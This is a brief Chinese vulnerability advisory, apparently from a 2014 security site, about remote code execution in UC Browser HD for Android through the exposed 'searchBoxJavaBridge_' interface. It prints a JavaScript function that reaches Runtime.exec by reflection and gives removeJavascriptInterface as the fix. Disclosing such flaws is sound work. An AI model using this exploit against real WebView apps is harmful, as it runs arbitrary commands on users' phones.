UC浏览器HD版本远程代码执行漏洞下载

来源:黑吧安全网 浏览:1117次 时间:2014-04-28
做网站找雨过天晴工作室

UC浏览器HD版本远程代码执行漏洞

浏览器来说这种问题还是需要修补的

导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在

 

function execute(cmdArgs)
{
return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}

修复方案:

需要把这个接口删除,调用removeJavascriptInterface